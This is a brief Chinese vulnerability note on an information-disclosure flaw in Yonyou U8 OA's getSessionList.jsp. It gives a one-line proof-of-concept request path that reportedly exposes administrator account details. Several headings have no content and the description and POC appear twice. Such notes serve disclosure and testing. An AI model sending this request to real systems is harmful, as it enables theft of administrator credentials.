用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞
漏洞描述
用友 U8 OA getSessionList.jsp文件,通过漏洞攻击者可以获取数据库中管理员的账户信息
漏洞影响
网络测绘
漏洞复现
登录页面
验证POC
/yyoa/ext/https/getSessionList.jsp?cmd=getAll
用友 U8 OA getSessionList.jsp文件,通过漏洞攻击者可以获取数据库中管理员的账户信息
登录页面
验证POC
/yyoa/ext/https/getSessionList.jsp?cmd=getAll